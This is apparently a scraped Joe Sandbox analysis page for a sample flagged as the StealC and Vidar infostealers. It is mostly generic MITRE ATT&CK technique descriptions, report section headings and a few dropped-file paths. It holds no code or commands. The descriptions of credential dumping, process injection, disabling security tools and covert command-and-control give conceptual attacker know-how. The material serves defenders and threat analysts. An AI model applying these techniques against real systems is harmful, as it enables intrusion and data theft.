Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report QPoX60yhZt.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Threatname: Vidar

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Exploits

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\BAEBFIIECBGCBGDHCAFC

C:\ProgramData\BAFCFHDHIIIECBGCAKFIJDHJEG

C:\ProgramData\CBKJEGCB

C:\ProgramData\DBAEHCGHIIIDHIECFHJD

C:\ProgramData\DQOFHVHTMG.xlsx

C:\ProgramData\DTBZGIOOSO.docx

C:\ProgramData\DVWHKMNFNN.xlsx

C:\ProgramData\EGIJKEHC

Windows Analysis Report
QPoX60yhZt.exe

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre